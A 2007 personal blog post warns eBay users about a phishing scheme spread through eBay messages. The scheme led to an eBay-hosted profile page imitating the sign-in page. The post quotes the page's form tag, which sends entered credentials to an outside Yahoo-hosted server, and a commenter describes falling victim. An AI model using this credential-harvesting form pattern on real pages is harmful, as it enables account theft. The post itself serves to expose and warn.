Saturday, February 17, 2007

Using Ebay to phish Ebay...

In what I think is the best phishing attempt I have seen for an eBay account, I received a question about my currently running eBay auction (and this question was sent to me via eBay's messaging system and viewable directly online in their messaging system)...

I want to know if this is the same item with the item listed at this address: http://members.ebay.com/aboutme/**********
From: imabrit! (1246)

Now, I know I did not list the same item under some other user, and I noticed that the sender of this message was someone who had a rating of 1246 (for real), so I went to look at the item to see what's up and I got to the following page:

This looks like a normal eBay login page. This is hosted on eBay (the URL for the page is on eBay). One might even expect to be prompted for authentication before they could look at another user's profile. However, I knew I already had a live authentication session at eBay and therefore shouldn't be prompted for credentials. So, I started to wonder if this was a phish attempt.

First I checked the URLs and the links and they all looked fine (yes this page was coming from eBay's site. Then I checked the page by walking to the page through the member profile lookup on the Community page. I still ended up with the same page that looks legit and is hosted by eBay.

But, it still didn't feel right, so I pulled up the source for the HTML page and much of it was the normal eBay page. However, the data entry form had the following code:

<form ... action="http://us.1.p10.webhosting.yahoo.com/forms?login=....." onSubmit="return checkForm0()">

This submits the form data to a web server hosted at Yahoo (not one of Yahoo's own services, but they allow others to pay for hosting).

I don't know how the average user could ever figure this out and I would expect that many, if not most, phishing aware technologists would also fall prey to this one (yeah, I do think I'm special :-)).

UPDATE (2/17): It's actually easier to tell than I thought (after looking closely at the real sign-in page): The URL for any eBay login MUST start with https://signin.ebay.com. Now, I've been an eBayer since 1998 and I pay close attention to phishing attempts, but I couldn't have quoted that to you until I looked for it today, so I'm not sure how many others will know.

Tags : / / / /

1 comment:

Anonymous said...

OMG, I have been on ebay for 7 years, and like to think that I am completely aware of any phishing attempts. Lord knows, I use to get plenty of them. However, I fell for this last night. I realized it today, when I noticed someone had used my account to send the exact same message to 5 other sellers. I immediately changed my password, and thankfully I caught it before any bidding or selling took place. I just hate to think my account was used to pyramid this out. I am glad you posted this for others to see.